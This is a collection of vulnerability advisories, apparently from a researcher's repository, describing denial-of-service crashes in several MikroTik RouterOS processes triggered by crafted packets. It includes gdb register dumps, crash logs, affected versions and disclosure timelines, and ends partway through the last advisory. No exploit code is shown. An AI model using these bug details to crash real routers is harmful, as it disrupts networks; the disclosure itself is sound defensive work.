#### Description

The `log` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `log` process due to invalid memory access.

Against stable `6.47`, the poc resulted in the following crash dump.

```shell
# cat /rw/logs/backtrace.log
2020.06.22-20:13:36.29@0:
2020.06.22-20:13:36.29@0:
2020.06.22-20:13:36.62@0: /nova/bin/log
2020.06.22-20:13:36.62@0: --- signal=11 --------------------------------------------
2020.06.22-20:13:36.62@0:
2020.06.22-20:13:36.62@0: eip=0x77709d2e eflags=0x00010202
2020.06.22-20:13:36.62@0: edi=0x0000004b esi=0x77718f00 ebp=0x7fec6858 esp=0x7fec6818
2020.06.22-20:13:36.62@0: eax=0x00000031 ebx=0x77717000 ecx=0x777171e8 edx=0x00000006
2020.06.22-20:13:36.62@0:
2020.06.22-20:13:36.62@0: maps:
2020.06.22-20:13:36.62@0: 08048000-08058000 r-xp 00000000 00:0c 1005 /nova/bin/log
2020.06.22-20:13:36.62@0: 776e1000-77716000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.22-20:13:36.62@0: 7771a000-77734000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1
2020.06.22-20:13:36.62@0: 77735000-77744000 r-xp 00000000 00:0c 945 /lib/libuc++.so
2020.06.22-20:13:36.62@0: 77745000-77791000 r-xp 00000000 00:0c 947 /lib/libumsg.so
2020.06.22-20:13:36.62@0: 77797000-7779e000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.22-20:13:36.62@0:
2020.06.22-20:13:36.62@0: stack: 0x7fec7000 - 0x7fec6818
2020.06.22-20:13:36.62@0: 48 68 ec 7f 7b ce 73 77 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 68 68 ec 7f 21 ac 70 77
2020.06.22-20:13:36.62@0: 40 00 00 00 1b fb 70 77 e8 71 71 77 c0 28 06 08 88 68 ec 7f ec 44 74 77 e4 29 06 08 40 69 ec 7f
2020.06.22-20:13:36.62@0:
2020.06.22-20:13:36.62@0: code: 0x77709d2e
2020.06.22-20:13:36.62@0: 8b 48 08 89 4c 96 04 e9 93 05 00 00 81 7d e0 ff
```

#### Affected Version

This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `6.48.2` still suffers from this vulnerability.

#### Timeline

+ 2020/03/06 - reported the vulnerability to the vendor
+ 2020/03/09 - the vendor confirmed the vulnerability
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20246/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20246

#### Description

The `mactel` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `mactel` process due to a NULL pointer dereference.

Against stable `6.47`, the poc resulted in the following crash dump.

```shell
# cat /rw/logs/backtrace.log
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0: /nova/bin/mactel
2020.06.22-20:25:36.17@0: --- signal=11 --------------------------------------------
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0: eip=0x0804ddc7 eflags=0x00010202
2020.06.22-20:25:36.17@0: edi=0x08055740 esi=0x7fe78144 ebp=0x7fe780c8 esp=0x7fe78090
2020.06.22-20:25:36.17@0: eax=0x00000000 ebx=0x776b9b40 ecx=0x0000000b edx=0xffffffff
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0: maps:
2020.06.22-20:25:36.17@0: 08048000-08051000 r-xp 00000000 00:0c 1041 /nova/bin/mactel
2020.06.22-20:25:36.17@0: 7762c000-77661000 r-xp 00000000 00:0c 966 /lib/libuClibc-0.9.33.2.so
2020.06.22-20:25:36.17@0: 77665000-7767f000 r-xp 00000000 00:0c 962 /lib/libgcc_s.so.1
2020.06.22-20:25:36.17@0: 77680000-7768f000 r-xp 00000000 00:0c 945 /lib/libuc++.so
2020.06.22-20:25:36.17@0: 77690000-776ad000 r-xp 00000000 00:0c 948 /lib/libucrypto.so
2020.06.22-20:25:36.17@0: 776ae000-776af000 r-xp 00000000 00:0c 967 /lib/libutil-0.9.33.2.so
2020.06.22-20:25:36.17@0: 776b1000-776b9000 r-xp 00000000 00:0c 951 /lib/libubox.so
2020.06.22-20:25:36.17@0: 776ba000-77706000 r-xp 00000000 00:0c 947 /lib/libumsg.so
2020.06.22-20:25:36.17@0: 7770c000-77713000 r-xp 00000000 00:0c 960 /lib/ld-uClibc-0.9.33.2.so
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0: stack: 0x7fe79000 - 0x7fe78090
2020.06.22-20:25:36.17@0: 44 81 e7 7f 01 00 00 00 ff ff ff ff 1f d0 04 08 58 57 05 08 28 b0 70 77 01 00 00 00 00 00 00 00
2020.06.22-20:25:36.17@0: 1c 85 e7 7f 04 1d 05 08 02 db 70 77 40 9b 6b 77 40 57 05 08 44 81 e7 7f f8 80 e7 7f 7c 4a 6b 77
2020.06.22-20:25:36.17@0:
2020.06.22-20:25:36.17@0: code: 0x804ddc7
2020.06.22-20:25:36.17@0: 8b 50 2f 89 55 da 66 8b 40 33 66 89 45 de 83 c4
```

#### Affected Version

This vulnerability was initially found in stable `6.46.3`, and it seems that the latest stable version `7.4` still suffers from this vulnerability.

#### Timeline

+ 2020/03/06 - reported the vulnerability to the vendor
+ 2020/03/09 - the vendor confirmed the vulnerability
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20248/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20248

#### Description

The `memtest` process suffers from an uncontrolled resource consumption vulnerability. By sending a crafted packet, an authenticated remote user can cause a high CPU load, which may make the device respond slowly or become unresponsive.

When testing the proof of concept on an x86 RouterOS VM, this vulnerability consumed all of the memory, eventually causing the whole system to reboot.

Against stable `6.46.3`, the poc resulted in a high CPU load on the device.

![memtest_high_cpu_load](./images/memtest_high_cpu_load.png)

#### Affected Version

This vulnerability was initially found in stable `6.46.3`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/04/20 - reported the vulnerability to the vendor
+ 2020/04/23 - the vendor reproduced and confirmed the vulnerability
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20248/images/memtest_high_cpu_load.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/cq674350529/pocs_slides/a1049d4dcf3de34e4aff173d85a5520bd94e50f4/advisory/MikroTik/CVE-2020-20248/images/memtest_high_cpu_load.png

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20249/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20249

#### Description

The `resolver` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `resolver` process due to invalid memory access.

Against stable `6.46.5`, the poc resulted in the following crash dump.

```shell
# cat /rw/logs/backtrace.log
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0: /nova/bin/resolver
2020.06.19-10:32:37.42@0: --- signal=11 --------------------------------------------
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0: eip=0x7774c049 eflags=0x00010212
2020.06.19-10:32:37.42@0: edi=0x080619d0 esi=0x7f8bd684 ebp=0x7f8bd5a8 esp=0x7f8bd59c
2020.06.19-10:32:37.42@0: eax=0x00000001 ebx=0x777544ec ecx=0x08061c60 edx=0x08061c60
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0: maps:
2020.06.19-10:32:37.42@0: 08048000-0805c000 r-xp 00000000 00:0c 995 /nova/bin/resolver
2020.06.19-10:32:37.42@0: 776f1000-77726000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.19-10:32:37.42@0: 7772a000-77744000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.19-10:32:37.42@0: 77745000-77754000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.19-10:32:37.42@0: 77755000-7775d000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.19-10:32:37.42@0: 7775e000-777aa000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.19-10:32:37.42@0: 777b0000-777b7000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0: stack: 0x7f8be000 - 0x7f8bd59c
2020.06.19-10:32:37.42@0: 08 d6 8b 7f b4 d5 8b 7f ec d5 8b 7f c8 d5 8b 7f f1 ef 04 08 ec d5 8b 7f 60 1c 06 08 08 d6 8b 7f
2020.06.19-10:32:37.42@0: f1 16 05 08 ec d5 8b 7f 2e 00 00 00 08 d6 8b 7f 03 17 05 08 e8 71 72 77 04 d6 8b 7f 57 1b 7b 77
2020.06.19-10:32:37.42@0:
2020.06.19-10:32:37.42@0: code: 0x7774c049
2020.06.19-10:32:37.42@0: 8b 10 01 c2 83 c2 04 52 83 c0 04 50 ff 75 08 e8
```

#### Affected Version

This vulnerability was initially found in stable `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/01/07 - the vendor reproduced and confirmed the vulnerability
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20250/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20250

#### Description

The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to a NULL pointer dereference.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault.
=> 0x80562c6:   mov    BYTE PTR [edx+eax*1],bl
   0x80562c9:   mov    ebx,esi
   0x80562cb:   mov    BYTE PTR [edx+eax*1+0x1],bl
   0x80562cf:   mov    ebx,edi
0x080562c6 in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0x0                 0
edx            0x0                 0
ebx            0x0                 0
esp            0x7fd8cb2c          0x7fd8cb2c
ebp            0x7fd8cb48          0x7fd8cb48
esi            0xff0000            16711680
edi            0xff000000          -16777216
eip            0x80562c6           0x80562c6
eflags         0x10246             [ PF ZF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
  1                      target:/nova/bin/lcdstat
* 2    process 635       target:/nova/bin/lcdstat
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: --- signal=11 --------------------------------------------
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: eip=0x080562c6 eflags=0x00010246
2020.06.04-15:48:13.77@0: edi=0xff000000 esi=0x00ff0000 ebp=0x7fd8cb48 esp=0x7fd8cb2c
2020.06.04-15:48:13.77@0: eax=0x00000000 ebx=0x00000000 ecx=0x00000000 edx=0x00000000
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: maps:
2020.06.04-15:48:13.77@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:48:13.77@0: 776be000-776f3000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0: 776f7000-77711000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:48:13.77@0: 77712000-77721000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-15:48:13.77@0: 77722000-7772a000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-15:48:13.77@0: 7772b000-77777000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-15:48:13.77@0: 7777d000-77784000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: stack: 0x7fd8d000 - 0x7fd8cb2c
2020.06.04-15:48:13.77@0: 00 00 00 00 00 00 00 01 80 c1 77 77 01 00 00 00 38 d4 d8 7f 50 5f 08 08 a8 5c 08 08 78 cb d8 7f
2020.06.04-15:48:13.77@0: 79 a2 05 08 78 36 08 08 00 00 00 00 00 de 77 77 8f cf d8 7f ff ff ff ff a8 5d 08 08 00 36 08 08
2020.06.04-15:48:13.77@0:
2020.06.04-15:48:13.77@0: code: 0x80562c6
2020.06.04-15:48:13.77@0: 88 1c 02 89 f3 88 5c 02 01 89 fb 88 5c 02 02 05
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/03/11 - reported the vulnerability to the vendor
+ 2020/06/02 - the vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20252/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20252

#### Description

The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to a NULL pointer dereference.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault.
=> 0x805b566:   cmp    BYTE PTR [eax+0x8],0x0
   0x805b56a:   jne    0x805b578
   0x805b56c:   push   edx
   0x805b56d:   push   edx
0x0805b566 in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0x807f14c           134738252
edx            0x1                 1
ebx            0x7fc106c8          2143356616
esp            0x7fc0fc70          0x7fc0fc70
ebp            0x7fc0fca8          0x7fc0fca8
esi            0x8085bf8           134765560
edi            0x8085e70           134766192
eip            0x805b566           0x805b566
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
  1                      target:/nova/bin/lcdstat
* 2    process 731       target:/nova/bin/lcdstat
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0: /nova/bin/lcdstat
2020.06.04-15:58:23.76@0: --- signal=11 --------------------------------------------
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0: eip=0x0805b566 eflags=0x00010202
2020.06.04-15:58:23.76@0: edi=0x08085e70 esi=0x08085bf8 ebp=0x7fc0fca8 esp=0x7fc0fc70
2020.06.04-15:58:23.76@0: eax=0x00000000 ebx=0x7fc106c8 ecx=0x0807f14c edx=0x00000001
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0: maps:
2020.06.04-15:58:23.76@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:58:23.76@0: 77680000-776b5000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:58:23.76@0: 776b9000-776d3000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:58:23.76@0: 776d4000-776e3000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-15:58:23.76@0: 776e4000-776ec000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-15:58:23.76@0: 776ed000-77739000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-15:58:23.76@0: 7773f000-77746000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0: stack: 0x7fc10000 - 0x7fc0fc70
2020.06.04-15:58:23.76@0: e4 9a 73 77 58 fe c0 7f a8 fc c0 7f 00 00 00 00 58 fe c0 7f 73 00 00 00 9c fc c0 7f 22 ac 70 77
2020.06.04-15:58:23.76@0: 58 fe c0 7f 72 00 00 08 b8 fc c0 7f 5c fd c0 7f 70 5e 08 08 c8 06 c1 7f c8 fc c0 7f ab b8 05 08
2020.06.04-15:58:23.76@0:
2020.06.04-15:58:23.76@0: code: 0x805b566
2020.06.04-15:58:23.76@0: 80 78 08 00 75 0c 52 52 50 53 e8 91 e7 ff ff 83
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/03/11 - reported the vulnerability to the vendor
+ 2020/06/02 - the vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20253/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20253

#### Description

The `lcdstat` process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to an arithmetic exception.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
Thread 2.1 "lcdstat" received signal SIGFPE, Arithmetic exception.
=> 0x8058539:   idiv   ecx
   0x805853b:   mov    DWORD PTR [ebp-0x20],eax
   0x805853e:   mov    eax,0x1
   0x8058543:   shl    eax,cl
0x08058539 in ?? ()
(gdb) i r
eax            0x8                 8
ecx            0x0                 0
edx            0x0                 0
ebx            0x7ffff030          2147479600
esp            0x7fffef50          0x7fffef50
ebp            0x7fffef88          0x7fffef88
esi            0x0                 0
edi            0x808b0c8           134787272
eip            0x8058539           0x8058539
eflags         0x10297             [ CF PF AF SF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
  1                      target:/nova/bin/lcdstat
* 2    process 281       target:/nova/bin/lcdstat
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0: /nova/bin/lcdstat
2020.06.04-16:17:48.62@0: --- signal=8 --------------------------------------------
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0: eip=0x08058539 eflags=0x00010297
2020.06.04-16:17:48.62@0: edi=0x0808b0c8 esi=0x00000000 ebp=0x7fffef88 esp=0x7fffef50
2020.06.04-16:17:48.62@0: eax=0x00000008 ebx=0x7ffff030 ecx=0x00000000 edx=0x00000000
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0: maps:
2020.06.04-16:17:48.62@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat
2020.06.04-16:17:48.62@0: 77f38000-77f6d000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-16:17:48.62@0: 77f71000-77f8b000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-16:17:48.62@0: 77f8c000-77f9b000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-16:17:48.62@0: 77f9c000-77fa4000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-16:17:48.62@0: 77fa5000-77ff1000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-16:17:48.62@0: 77ff7000-77ffe000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0: stack: 0x80000000 - 0x7fffef50
2020.06.04-16:17:48.62@0: 64 ef ff 7f ec b4 f9 77 84 b2 f9 77 ec b4 f9 77 a4 ef ff 7f 01 00 00 00 00 50 00 00 00 00 00 00
2020.06.04-16:17:48.62@0: a4 ef ff 7f 74 5e 08 08 14 00 00 00 30 f0 ff 7f a4 ef ff 7f 28 f0 ff 7f e8 ef ff 7f cc 8e 05 08
2020.06.04-16:17:48.62@0:
2020.06.04-16:17:48.62@0: code: 0x8058539
2020.06.04-16:17:48.62@0: f7 f9 89 45 e0 b8 01 00 00 00 d3 e0 48 31 ff 8b
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/03/11 - reported the vulnerability to the vendor
+ 2020/06/02 - the vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20254/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20254

#### Description

The `lcdstat` process suffers from a memory corruption vulnerability. By sending a crafted packet, an authenticated remote user can crash the `lcdstat` process due to a NULL pointer dereference.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
Thread 2.1 "lcdstat" received signal SIGSEGV, Segmentation fault.
=> 0x805a26e:   mov    esi,DWORD PTR [eax-0x4]
   0x805a271:   push   DWORD PTR [ebx+0x78]
   0x805a274:   call   0x8056298
   0x805a279:   mov    eax,DWORD PTR [esi+0x10]
0x0805a26e in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0x807f14c           134738252
edx            0x1                 1
ebx            0x7fbeb848          2143205448
esp            0x7fbeadf4          0x7fbeadf4
ebp            0x7fbeae18          0x7fbeae18
esi            0x7fbeaedc          2143203036
edi            0x0                 0
eip            0x805a26e           0x805a26e
eflags         0x10202             [ IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
  1                      target:/nova/bin/lcdstat
* 2    process 465       target:/nova/bin/lcdstat
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: --- signal=11 --------------------------------------------
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: eip=0x0805a26e eflags=0x00010202
2020.06.04-15:32:04.67@0: edi=0x00000000 esi=0x7fbeaedc ebp=0x7fbeae18 esp=0x7fbeadf4
2020.06.04-15:32:04.67@0: eax=0x00000000 ebx=0x7fbeb848 ecx=0x0807f14c edx=0x00000001
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: maps:
2020.06.04-15:32:04.67@0: 08048000-0807e000 r-xp 00000000 00:0c 1054 /nova/bin/lcdstat
2020.06.04-15:32:04.67@0: 776fd000-77732000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0: 77736000-77750000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-15:32:04.67@0: 77751000-77760000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-15:32:04.67@0: 77761000-77769000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-15:32:04.67@0: 7776a000-777b6000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-15:32:04.67@0: 777bc000-777c3000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: stack: 0x7fbeb000 - 0x7fbeadf4
2020.06.04-15:32:04.67@0: 48 b8 be 7f 18 ae be 7f 95 ab 05 08 a0 e5 07 08 00 00 00 00 4c f1 07 08 48 b8 be 7f dc ae be 7f
2020.06.04-15:32:04.67@0: 00 00 00 00 58 ae be 7f 00 ad 05 08 48 b8 be 7f 00 00 00 00 00 00 00 00 ec 04 76 77 d8 af be 7f
2020.06.04-15:32:04.67@0:
2020.06.04-15:32:04.67@0: code: 0x805a26e
2020.06.04-15:32:04.67@0: 8b 70 fc ff 73 78 e8 1f c0 ff ff 8b 46 10 83 c4
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/03/11 - reported the vulnerability to the vendor
+ 2020/06/02 - the vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20262/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20262

#### Description

The `ipsec` process suffers from an assertion failure vulnerability: it contains a reachable assertion. By sending a crafted packet, an authenticated remote user can crash the `ipsec` process by triggering that assertion.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGABRT, Aborted.
=> 0x7748155b :   pop    ebx
   0x7748155c :   cmp    eax,0xfffff000
   0x77481561 :   jbe    0x77481571
   0x77481563 :   mov    edx,DWORD PTR [ebx-0x34]
0x7748155b in raise () from target:/lib/libc.so.0
(gdb) i r
eax            0x0                 0
ecx            0x291               657
edx            0x6                 6
ebx            0x291               657
esp            0x7f8fa448          0x7f8fa448
ebp            0x7f8fa450          0x7f8fa450
esi            0x77489200          2001244672
edi            0x1                 1
eip            0x7748155b          0x7748155b
eflags         0x246               [ PF ZF IF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 657       target:/ram/pckg/security/nova/bin/ipsec
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: --- signal=6 --------------------------------------------
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: eip=0x7748155b eflags=0x00000246
2020.06.04-18:25:16.04@0: edi=0x00000001 esi=0x77489200 ebp=0x7f8fa450 esp=0x7f8fa448
2020.06.04-18:25:16.04@0: eax=0x00000000 ebx=0x00000291 ecx=0x00000291 edx=0x00000006
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: maps:
2020.06.04-18:25:16.04@0: 08048000-080b5000 r-xp 00000000 00:11 42 /ram/pckg/security/nova/bin/ipsec
2020.06.04-18:25:16.04@0: 77453000-77488000 r-xp 00000000 00:0c 964 /lib/libuClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0: 7748c000-774a6000 r-xp 00000000 00:0c 960 /lib/libgcc_s.so.1
2020.06.04-18:25:16.04@0: 774a7000-774b6000 r-xp 00000000 00:0c 944 /lib/libuc++.so
2020.06.04-18:25:16.04@0: 774b7000-774b9000 r-xp 00000000 00:0c 959 /lib/libdl-0.9.33.2.so
2020.06.04-18:25:16.04@0: 774bb000-774d0000 r-xp 00000000 00:1f 15 /ram/pckg/dhcp/lib/libudhcp.so
2020.06.04-18:25:16.04@0: 774d2000-774d8000 r-xp 00000000 00:0c 951 /lib/liburadius.so
2020.06.04-18:25:16.04@0: 774d9000-77524000 r-xp 00000000 00:0c 956 /lib/libssl.so.1.0.0
2020.06.04-18:25:16.04@0: 77528000-77530000 r-xp 00000000 00:0c 950 /lib/libubox.so
2020.06.04-18:25:16.04@0: 77531000-7757d000 r-xp 00000000 00:0c 946 /lib/libumsg.so
2020.06.04-18:25:16.04@0: 77580000-7759d000 r-xp 00000000 00:0c 947 /lib/libucrypto.so
2020.06.04-18:25:16.04@0: 7759e000-776fb000 r-xp 00000000 00:0c 954 /lib/libcrypto.so.1.0.0
2020.06.04-18:25:16.04@0: 7770e000-77715000 r-xp 00000000 00:0c 958 /lib/ld-uClibc-0.9.33.2.so
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: stack: 0x7f8fb000 - 0x7f8fa448
2020.06.04-18:25:16.04@0: 00 90 48 77 00 90 48 77 88 a4 8f 7f 77 d0 47 77 06 00 00 00 00 92 48 77 20 00 00 00 00 00 00 00
2020.06.04-18:25:16.04@0: cc a4 8f 7f e8 a4 8f 7f 84 a4 8f 7f e4 da 57 77 01 00 00 00 e4 da 57 77 cc a4 8f 7f 01 00 00 00
2020.06.04-18:25:16.04@0:
2020.06.04-18:25:16.04@0: code: 0x7748155b
2020.06.04-18:25:16.04@0: 5b 3d 00 f0 ff ff 76 0e 8b 93 cc ff ff ff f7 d8
```

#### Affected Version

This vulnerability was initially found in long-term `6.44.6`, and was fixed in stable `6.47`.

#### Timeline

+ 2020/01/06 - reported the vulnerability to the vendor
+ 2020/06/02 - the vendor fixed it in stable `6.47`
+ 2021/05/04 - CVE was assigned

--------------------------------------------------------------------------------
/advisory/MikroTik/CVE-2020-20264/README.md:
--------------------------------------------------------------------------------
### CVE-2020-20264

#### Description

The `netwatch` process suffers from a division-by-zero vulnerability. By sending a crafted packet, an authenticated remote user can crash the `netwatch` process due to an arithmetic exception.

Against stable `6.46.5`, the poc resulted in the following crash captured by `gdb`.

```shell
(gdb) c
Continuing.

Program received signal SIGFPE, Arithmetic exception.
=> 0x804c6d7:   div    esi
   0x804c6d9:   mov    edx,DWORD PTR [ebx+0x30]
   0x804c6dc:   cmp    edx,eax
   0x804c6de:   jae    0x804c74e
0x0804c6d7 in ?? ()
(gdb) i r
eax            0x0                 0
ecx            0x0                 0
edx            0x0                 0
ebx            0x8051020           134549536
esp            0x7ffff3b0          0x7ffff3b0
ebp            0x7ffff3f8          0x7ffff3f8
esi            0x0                 0
edi            0x5ed9208c          1591287948
eip            0x804c6d7           0x804c6d7
eflags         0x10246             [ PF ZF IF RF ]
cs             0x73                115
ss             0x7b                123
ds             0x7b                123
es             0x7b                123
fs             0x0                 0
gs             0x33                51
(gdb) info inferiors
  Num  Description       Executable
* 1    process 384       target:/ram/pckg/advanced-tools/nova/bin/netwatch
```

And the crash dump in `/rw/logs/backtrace.log` was:

```shell
# cat /rw/logs/backtrace.log
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0:
2020.06.04-16:25:57.65@0: /ram/pckg/advanced-tools/nova/bin/netwatch
2020.06.04-16:25:57.65@0: --- signal=8 --------------------------------------------
